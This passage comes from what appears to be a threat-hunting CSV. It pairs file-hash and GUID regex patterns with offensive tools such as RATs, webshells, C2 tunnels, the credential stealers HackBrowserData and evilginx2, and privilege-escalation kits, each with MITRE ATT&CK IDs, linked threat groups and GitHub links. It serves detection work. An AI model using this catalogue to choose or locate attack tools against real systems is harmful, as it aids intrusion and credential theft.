TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28174" "*675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6*",".{0,1000}675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28176" "*675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e*",".{0,1000}675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28177" "*67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f*",".{0,1000}67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28178" "*676193b9ffe3b9c725599cb718c9c2f961254e233e00e3c38ad2ccb793051acd*",".{0,1000}676193b9ffe3b9c725599cb718c9c2f961254e233e00e3c38ad2ccb793051acd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - 
TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28179" "*676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b*",".{0,1000}676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","#filehash","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","28181" "*67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb*",".{0,1000}67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28182" "*676E89F3-4785-477A-BA1C-B30340F598D5*",".{0,1000}676E89F3\-4785\-477A\-BA1C\-B30340F598D5.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","#GUIDproject","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","28183" 
"*67780c88b2cac99c7c6cd8fb720136a2617ac4a0e79894cc0a05925d4517db45*",".{0,1000}67780c88b2cac99c7c6cd8fb720136a2617ac4a0e79894cc0a05925d4517db45.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28184" "*67830961a8dee229b3446833b1c4a2b6228ed3b949ee481ea3681bdb4a5f71c1*",".{0,1000}67830961a8dee229b3446833b1c4a2b6228ed3b949ee481ea3681bdb4a5f71c1.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28185" "*67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28*",".{0,1000}67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28186" "*6783b4ec3c93421324cf6b7835994545baf29c5b1341a26a565e57af77ba965a*",".{0,1000}6783b4ec3c93421324cf6b7835994545baf29c5b1341a26a565e57af77ba965a.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28187" "*6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e*",".{0,1000}6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","28188" "*678ce24e-70c4-47b1-b595-ca0835ba35d9*",".{0,1000}678ce24e\-70c4\-47b1\-b595\-ca0835ba35d9.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#GUIDproject","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28189" "*67908b4e774d138792557c430f8ec4f48aa9094b0c639bd57e7f49aacc17788e*",".{0,1000}67908b4e774d138792557c430f8ec4f48aa9094b0c639bd57e7f49aacc17788e.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","28190" 
"*6793418c5f683d05f50c73efea706e93ab08b8027c6711cc2f4c8d8dbf91c439*",".{0,1000}6793418c5f683d05f50c73efea706e93ab08b8027c6711cc2f4c8d8dbf91c439.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28191" "*679703e9859c20ab39d6be992aa7d979710d9ace*",".{0,1000}679703e9859c20ab39d6be992aa7d979710d9ace.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","28193" "*67a426a646b50409aaaf70383a7f6b4b10981034623b4089a32fabb839997656*",".{0,1000}67a426a646b50409aaaf70383a7f6b4b10981034623b4089a32fabb839997656.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","28194" "*67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3*",".{0,1000}67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28195" "*67aa975f27ff2c5b874c62c9665c345e54c9dedecacf8b8439d6e30b86906350*",".{0,1000}67aa975f27ff2c5b874c62c9665c345e54c9dedecacf8b8439d6e30b86906350.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","28196" "*67bac3b5650c719fbc15dcdb5ccb2dd07414876f6b55baa967342356d80357dd*",".{0,1000}67bac3b5650c719fbc15dcdb5ccb2dd07414876f6b55baa967342356d80357dd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28197" 
"*67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287*",".{0,1000}67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28198" "*67c7d31360028ba45e62e75295a20464fcb99cf1c6469618e8f8b97614cfe950*",".{0,1000}67c7d31360028ba45e62e75295a20464fcb99cf1c6469618e8f8b97614cfe950.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28199" "*67d07f5020768f37186d4ca33145eef3e117bd5bd53d4976d55eb314bf919f06*",".{0,1000}67d07f5020768f37186d4ca33145eef3e117bd5bd53d4976d55eb314bf919f06.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28200" "*67d132f09b67e82cb54b941814c28737974165bcec5139909ed455fe97f2ab41*",".{0,1000}67d132f09b67e82cb54b941814c28737974165bcec5139909ed455fe97f2ab41.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","28201" "*67d5e8f4f9a37b6519c10921eea1306d9a33bb20f3b9f1b35cb22f3b00b179db*",".{0,1000}67d5e8f4f9a37b6519c10921eea1306d9a33bb20f3b9f1b35cb22f3b00b179db.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28202" "*67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5*",".{0,1000}67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","28203" "*67e0def5a9c36e5ecef1fb735955c76efe3133ad7d64a35bd5228c856edc9a94*",".{0,1000}67e0def5a9c36e5ecef1fb735955c76efe3133ad7d64a35bd5228c856edc9a94.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28204" "*67e582bc87c9c0d604ac539ba02c954f56f0ba59fc33c6aa52c145674561d811*",".{0,1000}67e582bc87c9c0d604ac539ba02c954f56f0ba59fc33c6aa52c145674561d811.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28205" "*67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8*",".{0,1000}67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28206" "*67ed30524444d6941dc4697249242b34db97c3245bca48fffd1899c027dcb410*",".{0,1000}67ed30524444d6941dc4697249242b34db97c3245bca48fffd1899c027dcb410.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28207" 
"*67f6f13cd32457711eb5171e7f87942319edd25e5463ac770e7666d71b1382b7*",".{0,1000}67f6f13cd32457711eb5171e7f87942319edd25e5463ac770e7666d71b1382b7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28208" "*67f8634f21a97d71f8baba63156aa6a50918fbd9df054c23b28138ceaa39ba34*",".{0,1000}67f8634f21a97d71f8baba63156aa6a50918fbd9df054c23b28138ceaa39ba34.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28209" "*67f8ab8f84f3f38e993bee454179fe95008c62fa6c44b385306c3617718e4204*",".{0,1000}67f8ab8f84f3f38e993bee454179fe95008c62fa6c44b385306c3617718e4204.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28210" "*68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9*",".{0,1000}68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9.{0,1000}","offensive_tool_keyword","CDK","CDK is an 
open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28212" "*68115c6e039363be3b80e416ed462d97f8c763af800237b1fa183cca1180bac5*",".{0,1000}68115c6e039363be3b80e416ed462d97f8c763af800237b1fa183cca1180bac5.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28213" "*68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6*",".{0,1000}68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28214" "*68218101d6c83cd34c23c9afc7ca2c7fa13a1bc8138481232a9410c5da4a9386*",".{0,1000}68218101d6c83cd34c23c9afc7ca2c7fa13a1bc8138481232a9410c5da4a9386.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28217" "*6824586e095fec0e58ee872ecf5108b370bd8713987988510aacf3793cbe1114*",".{0,1000}6824586e095fec0e58ee872ecf5108b370bd8713987988510aacf3793cbe1114.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","28218" "*683bcd5fce3d71c8fd2c0e4c8a5a7254033638848035b25f04d82fe44a992e0d*",".{0,1000}683bcd5fce3d71c8fd2c0e4c8a5a7254033638848035b25f04d82fe44a992e0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28222" "*683ed7b04ebf596dbfdd30456656bed8c1a8f8ee4b8eec411ad8bce572e10240*",".{0,1000}683ed7b04ebf596dbfdd30456656bed8c1a8f8ee4b8eec411ad8bce572e10240.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","28223" "*6844B720CFF6E079879333D6FDA944D3D3EA78878B48AFFD45AC81700BBA0F5E*",".{0,1000}6844B720CFF6E079879333D6FDA944D3D3EA78878B48AFFD45AC81700BBA0F5E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28225" "*68538ddd64073d5e6b9edf092c7a364c0380734826a00bc10e12a7cdc370410a*",".{0,1000}68538ddd64073d5e6b9edf092c7a364c0380734826a00bc10e12a7cdc370410a.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","28226" "*685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b*",".{0,1000}685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28227" "*685e710dd49930b791f10fe68c46a2eae0ecdd93191ceb459425b338a0980844*",".{0,1000}685e710dd49930b791f10fe68c46a2eae0ecdd93191ceb459425b338a0980844.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#filehash","https://github.com/TrashDono/MegaMedusa/blob/155b922adbe6598ba7553058a1515d607bd6e940/MegaMedusa.js","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","28228" "*686c2fd56c44f2621950ffcebad071e91db115a57f2a4a72e27dcf65c94190ed*",".{0,1000}686c2fd56c44f2621950ffcebad071e91db115a57f2a4a72e27dcf65c94190ed.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28230" "*6870cfc153e4d1478d4a3907036f32b7ebb1183810375475a436debb584fd8d3*",".{0,1000}6870cfc153e4d1478d4a3907036f32b7ebb1183810375475a436debb584fd8d3.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. 
